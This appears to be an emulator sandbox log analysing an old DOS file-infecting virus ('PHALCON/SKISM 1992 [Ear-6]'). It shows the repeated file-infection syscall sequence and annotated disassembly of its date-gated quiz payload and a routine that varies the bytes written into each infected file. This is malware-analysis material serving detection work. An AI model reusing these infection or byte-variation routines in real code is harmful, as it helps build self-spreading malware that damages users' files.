2018-12-25T11:46:13.821974741Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:13.82520881Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:13.834615102Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:13.836311875Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:13.844696492Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:13.855831092Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.859859264Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.867274906Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:13.87493077Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:13.877837242Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.885456555Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:13.888676365Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:13.891336913Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:13.894739116Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:13.904933051Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:13.907653781Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:13.916314983Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:13.927097502Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.930080482Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.938145678Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:13.944941813Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:13.947178641Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.955909081Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:13.959069641Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:13.960620815Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:13.964621219Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:13.974245474Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:13.975732806Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:13.985032346Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:13.995696781Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.998429823Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.005985929Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.013006042Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.01502015Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.02216223Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.025138419Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.026538179Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.029502091Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.039979697Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.042709763Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.051179405Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.062409071Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.065262459Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.073648707Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.08157061Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.08372098Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.091098678Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.095437948Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.097451042Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.100757224Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.112447704Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.114355932Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.1233828Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.135453457Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.140078341Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.147280147Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.154471277Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.157186446Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.159790206Z 59 PC: 12af7 | Change current directory
2018-12-25T11:46:14.164272087Z 59 PC: 12b01 | Change current directory
; Disassembly window printed after DOS "Get date" (int 21h, AH=2Ah) returns; on return DL = day of month.
; Payload trigger check. In this run the day test passes: the next log row is op 44 (Get time)
; returning to PC 12b0e, i.e. the int 0x21 at 0x12b0c below was actually executed.
2018-12-25T11:46:14.175451892Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1 ; is it the 1st of the month?
0x12b08: jne 0x12b5c ; no -> skip the payload (not taken in this run)
0x12b0a: mov ah, 0x2c ; AH=2Ch: DOS "Get time"
0x12b0c: int 0x21 ; on return DL = hundredths of a second
0x12b0e: cmp dl, 0x55 ; compare hundredths with 85
0x12b11: jg 0x12b5c ; above 85 -> skip (signed compare; harmless for a 0..99 value)
0x12b13: and dx, 7 ; clears DH and keeps hundredths & 7 -> index 0..7
0x12b16: shl dl, 1 ; index * 2 = byte offset into a word table
0x12b18: mov bx, bp ; bx = base (bp presumably the delta offset - confirm)
0x12b1a: add bx, dx ; bx = base + table offset
0x12b1c: mov dx, word ptr [bx + 0x3b4] ; load the selected entry from the 8-entry word table at bp+0x3b4
0x12b20: add dx, bp ; relocate the entry to a run-time address
0x12b22: inc dx ; skip the entry's first byte; the text starts one byte in
0x12b23: push dx ; keep the text pointer for the second print
0x12b24: mov ah, 9 ; AH=09h: DOS "Display string" ($-terminated)
0x12b26: lea dx, word ptr [bp + 0x40c] ; fixed leading message
0x12b2a: int 0x21 ; print it
0x12b2c: pop dx ; dx = selected table string
0x12b2d: int 0x21 ; print it; relies on AH still being 9 from the previous call
0x12b2f: dec dx ; step back to the entry's first byte
; Disassembly window printed after DOS "Get time" (int 21h, AH=2Ch) returns inside the payload;
; on return DL = hundredths of a second. The code picks one of 8 table strings from the clock,
; prints a three-part question and waits for a key. The log rows that follow confirm this path
; ran: Display string at PC 12b2c, 12b2f and 12b37, then op 7 (console input) at PC 12b3b.
2018-12-25T11:46:14.178009688Z 44 PC: 12b0e | Get time 0x12b0e: cmp dl, 0x55 ; compare hundredths with 85
0x12b11: jg 0x12b5c ; above 85 -> skip the payload (not taken in this run)
0x12b13: and dx, 7 ; clears DH and keeps hundredths & 7 -> index 0..7
0x12b16: shl dl, 1 ; index * 2 = byte offset into a word table
0x12b18: mov bx, bp ; bx = base (bp presumably the delta offset - confirm)
0x12b1a: add bx, dx ; bx = base + table offset
0x12b1c: mov dx, word ptr [bx + 0x3b4] ; load the selected entry from the word table at bp+0x3b4
0x12b20: add dx, bp ; relocate the entry to a run-time address
0x12b22: inc dx ; skip the entry's first byte; the text starts one byte in
0x12b23: push dx ; keep the text pointer for the second print
0x12b24: mov ah, 9 ; AH=09h: DOS "Display string" ($-terminated)
0x12b26: lea dx, word ptr [bp + 0x40c] ; fixed leading message (logged as 'PHALCON/SKISM 1992 [Ear-6] Alert! Where is the ')
0x12b2a: int 0x21 ; print it
0x12b2c: pop dx ; dx = selected table string (logged as 'Auditory Canal' in this run)
0x12b2d: int 0x21 ; print it; relies on AH still being 9 from the previous call
0x12b2f: dec dx ; step back to the entry's first byte
0x12b30: push dx ; save that pointer; presumably the byte encodes the expected answer - TODO confirm
0x12b31: lea dx, word ptr [bp + 0x43d] ; trailing text with the three numbered choices
0x12b35: int 0x21 ; print it (AH still 9)
0x12b37: mov ah, 7 ; AH=07h: direct console input without echo; the call is logged at PC 12b3b
2018-12-25T11:46:14.180613647Z 9 PC: 12b2c | Display string (String= 'PHALCON/SKISM 1992 [Ear-6] Alert! Where is the ')
2018-12-25T11:46:14.187841835Z 9 PC: 12b2f | Display string (String= 'Auditory Canal')
2018-12-25T11:46:14.190233328Z 9 PC: 12b37 | Display string (String= ' located? 1. External Ear 2. Middle Ear 3. Inner Ear ( )')
2018-12-25T11:46:14.200397948Z 7 PC: 12b3b | Direct console input without echo

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2681,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:14.321651727Z 26 PC: 12ac8 | Set disk transfer address
2018-12-25T11:46:14.323029185Z 71 PC: 12ada | Get current directory
2018-12-25T11:46:14.326309226Z 78 PC: 12b9e | Find first file
2018-12-25T11:46:14.332580936Z 78 PC: 12b9e | Find first file (See above)
2018-12-25T11:46:14.344931512Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:14.352308579Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:46:14.360073119Z 62 PC: 12bb4 | Close file
2018-12-25T11:46:14.362519062Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.37064516Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:14.373788856Z 66 PC: 12c90 | Move file pointer
2018-12-25T11:46:14.375684227Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-25T11:46:14.37948137Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-25T11:46:14.396088904Z 87 PC: 12ce4 | Get or set file date and time
2018-12-25T11:46:14.397766899Z 62 PC: 12ce8 | Close file
2018-12-25T11:46:14.41384111Z 67 PC: 12cf7 | Get or set file attributes
2018-12-25T11:46:14.425581517Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.428929357Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.436704225Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.444408381Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.446612098Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.45430177Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.458268889Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.459491563Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.461492785Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.468643056Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.470565482Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.479193687Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.487588521Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.489564815Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.494402211Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.499277919Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.501356244Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.508595372Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.512185237Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.514017761Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.517154501Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.528357658Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.530261575Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.537426531Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.548998013Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.554029398Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.562390013Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.569627597Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.572643077Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.580834457Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.584120245Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.586897133Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.590102573Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.599842404Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.602324714Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.610964881Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.622336008Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.625936177Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.633181458Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.640208172Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.643066787Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.650493521Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.653812235Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.655876369Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.659368711Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.669907949Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.671906317Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.682137772Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.697138058Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.70118572Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.709050513Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.716256244Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.718340682Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.727175799Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.730701089Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.732430998Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.736315029Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.746946729Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.748579044Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.757475661Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.76907392Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.771768871Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.77877497Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.78648631Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.788550651Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.796198091Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.800588116Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.802215019Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.805671587Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.816382267Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.818346348Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.826988152Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.838854082Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.842097042Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.849667812Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.857337697Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.858729197Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.860481371Z 59 PC: 12af7 | Change current directory
2018-12-25T11:46:14.86379619Z 59 PC: 12b01 | Change current directory
; Instruction window the sandbox printed after the "Get date" call
; (INT 21h, AH=2Ah: DL=day, DH=month, CX=year).
; Payload trigger: the message code runs only when the day of the month is 1 and a
; following "Get time" returns hundredths <= 0x55; either failed test branches to
; 0x12b5c. In this run both tests passed: the log continues with Get time at
; PC 12b0e and three Display string calls.
; Analysis note: the path is clock-gated, so a dynamic run only reaches it when the
; emulated date is the 1st, and even then not on every run.
2018-12-25T11:46:14.874063226Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1  ; DL = day of month returned by Get date
0x12b08: jne 0x12b5c  ; not the 1st: skip the message code
0x12b0a: mov ah, 0x2c  ; INT 21h function 2Ch = Get time
0x12b0c: int 0x21  ; returns DL = hundredths of a second
0x12b0e: cmp dl, 0x55  ; 0x55 = 85
0x12b11: jg 0x12b5c  ; skip when hundredths > 85 (signed compare; the value is 0..99)
0x12b13: and dx, 7  ; dx = DL & 7 (also clears DH): 0..7
0x12b16: shl dl, 1  ; times 2: byte offset into a table of words
0x12b18: mov bx, bp
0x12b1a: add bx, dx  ; bx = bp + offset
0x12b1c: mov dx, word ptr [bx + 0x3b4]  ; load one of up to eight word entries at bp+0x3b4
0x12b20: add dx, bp  ; rebase the entry by bp
0x12b22: inc dx  ; step past the entry's first byte (its meaning is not shown in this window)
0x12b23: push dx  ; keep the selected string pointer for the second print
0x12b24: mov ah, 9  ; INT 21h function 09h = Display string
0x12b26: lea dx, word ptr [bp + 0x40c]  ; fixed first string
0x12b2a: int 0x21  ; logged at PC 12b2c: 'PHALCON/SKISM 1992 [Ear-6] Alert! Where is the '
0x12b2c: pop dx  ; dx = table-selected string
0x12b2d: int 0x21  ; logged at PC 12b2f: 'Auditory Nerve' in this run
0x12b2f: dec dx  ; back to the byte skipped at 0x12b22
; Instruction window the sandbox printed after the "Get time" call issued at
; 0x12b0c (INT 21h, AH=2Ch: DL=hundredths of a second).
; Second half of the payload trigger plus the message output: when hundredths
; <= 0x55, a string is picked from a table by DL & 7 and printed between two
; fixed strings, then a key is read. The three Display string calls and the
; console input are logged directly below this window.
2018-12-25T11:46:14.876302467Z 44 PC: 12b0e | Get time 0x12b0e: cmp dl, 0x55  ; DL = hundredths from Get time; 0x55 = 85
0x12b11: jg 0x12b5c  ; skip when hundredths > 85 (signed compare; the value is 0..99)
0x12b13: and dx, 7  ; dx = DL & 7 (also clears DH): 0..7
0x12b16: shl dl, 1  ; times 2: byte offset into a table of words
0x12b18: mov bx, bp
0x12b1a: add bx, dx  ; bx = bp + offset
0x12b1c: mov dx, word ptr [bx + 0x3b4]  ; load one of up to eight word entries at bp+0x3b4
0x12b20: add dx, bp  ; rebase the entry by bp
0x12b22: inc dx  ; step past the entry's first byte (its meaning is not shown in this window)
0x12b23: push dx  ; keep the selected string pointer for the second print
0x12b24: mov ah, 9  ; INT 21h function 09h = Display string
0x12b26: lea dx, word ptr [bp + 0x40c]  ; fixed first string
0x12b2a: int 0x21  ; logged at PC 12b2c: 'PHALCON/SKISM 1992 [Ear-6] Alert! Where is the '
0x12b2c: pop dx  ; dx = table-selected string
0x12b2d: int 0x21  ; logged at PC 12b2f: 'Auditory Nerve' in this run
0x12b2f: dec dx  ; back to the byte skipped at 0x12b22
0x12b30: push dx  ; save that pointer; its use is outside this window
0x12b31: lea dx, word ptr [bp + 0x43d]  ; fixed third string
0x12b35: int 0x21  ; logged at PC 12b37: ' located? 1. External Ear 2. Middle Ear 3. Inner Ear ( )'
0x12b37: mov ah, 7  ; INT 21h function 07h = direct console input without echo (logged at PC 12b3b)
2018-12-25T11:46:14.878983309Z 9 PC: 12b2c | Display string (String= 'PHALCON/SKISM 1992 [Ear-6] Alert! Where is the ')
2018-12-25T11:46:14.884970187Z 9 PC: 12b2f | Display string (String= 'Auditory Nerve')
2018-12-25T11:46:14.887320684Z 9 PC: 12b37 | Display string (String= ' located? 1. External Ear 2. Middle Ear 3. Inner Ear ( )')
2018-12-25T11:46:14.912534016Z 7 PC: 12b3b | Direct console input without echo

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2681,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:14.461396016Z 26 PC: 12ac8 | Set disk transfer address
2018-12-25T11:46:14.463067814Z 71 PC: 12ada | Get current directory
2018-12-25T11:46:14.466654449Z 78 PC: 12b9e | Find first file
2018-12-25T11:46:14.470761298Z 78 PC: 12b9e | Find first file (See above)
2018-12-25T11:46:14.474619566Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:14.485849942Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:46:14.490692043Z 62 PC: 12bb4 | Close file
2018-12-25T11:46:14.492631111Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.500630121Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:14.505510121Z 66 PC: 12c90 | Move file pointer
; Instruction window the sandbox printed after the "Get time" call
; (INT 21h, AH=2Ch: CH=hour, CL=minute, DH=second, DL=hundredths).
; It patches two time-derived words into the region bp+0x103..bp+0x112 and then
; assembles a byte sequence in the buffer at bp+0x570 from that region, a second
; 11-byte region and three literal opcode bytes.
; NOTE(review): because the copied region depends on the clock, the bytes that end
; up in each infected file presumably differ between infections; a byte signature
; should not rely on the patched positions. The rest of the routine is outside
; this window.
2018-12-25T11:46:14.50680069Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx  ; save CX (hour:minute) at bp+0x10c
0x12c98: and cx, 0x1f  ; keep the low 5 bits: 0..31
0x12c9b: add cx, 0x200  ; cx = 0x200..0x21f
0x12c9f: mov word ptr [bp + 0x107], cx  ; store it at bp+0x107, inside the 16-byte block copied below
0x12ca3: lea di, word ptr [bp + 0x570]  ; di = start of the output buffer
0x12ca7: mov al, 0x53  ; 0x53 is the one-byte encoding of `push bx`
0x12ca9: stosb byte ptr es:[di], al  ; buffer[0] = 0x53
0x12caa: lea si, word ptr [bp + 0x103]  ; si = first source block
0x12cae: push si  ; saved; the matching pop is outside this window
0x12caf: mov cx, 0x10  ; length of the first block: 16 bytes
0x12cb2: push cx  ; saved; restored at 0x12cc4
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]  ; copy bp+0x103..bp+0x112 into the buffer
0x12cb5: mov al, 0x5b  ; 0x5b is the one-byte encoding of `pop bx`
0x12cb7: stosb byte ptr es:[di], al  ; append it
0x12cb8: lea si, word ptr [bp + 0x4f7]  ; si = second source block
0x12cbc: mov cx, 0xb  ; 11 bytes
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]  ; append bp+0x4f7..bp+0x501
0x12cc1: mov al, 0x53  ; another `push bx` byte
0x12cc3: stosb byte ptr es:[di], al  ; append it
0x12cc4: pop cx  ; cx = 0x10 again (value pushed at 0x12cb2)
2018-12-25T11:46:14.50934819Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-25T11:46:14.521940791Z 87 PC: 12ce4 | Get or set file date and time
2018-12-25T11:46:14.523774366Z 62 PC: 12ce8 | Close file
2018-12-25T11:46:14.538813215Z 67 PC: 12cf7 | Get or set file attributes
2018-12-25T11:46:14.550260744Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.553233917Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.56077161Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.568057808Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.569983847Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.577597999Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.580810814Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.582189941Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.585021916Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.595633355Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.597336325Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.605986537Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.618586364Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.621479317Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.628568584Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.636429897Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.638569854Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.645988426Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.650490891Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.653259653Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.657772724Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.668871902Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.672037881Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.681553533Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.692959105Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.697621169Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.705427176Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.713960942Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.719219867Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.72658296Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.730003993Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.732167216Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.73518034Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.744970112Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.747431958Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.755952504Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.766717305Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.770755709Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.777996631Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.785549694Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.788399737Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.796787799Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.799921799Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.80163389Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.806269179Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.816153603Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.818056267Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.828500006Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.839456906Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.842626494Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.850487621Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.85834934Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.860739793Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.869757853Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.887086674Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.888819926Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.892394402Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:14.903930329Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:14.906014605Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:14.930702103Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:14.942413846Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:14.945432746Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.952985951Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:14.960635042Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:14.962731519Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:14.9700588Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:14.973745305Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:14.975205891Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:14.978029244Z 64 PC: 12ef3 | Write file or device (See above)
